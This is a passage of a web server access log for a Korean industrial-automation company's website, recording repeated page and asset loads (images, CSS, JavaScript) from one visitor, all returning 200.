"https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10528] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10542] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:55:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 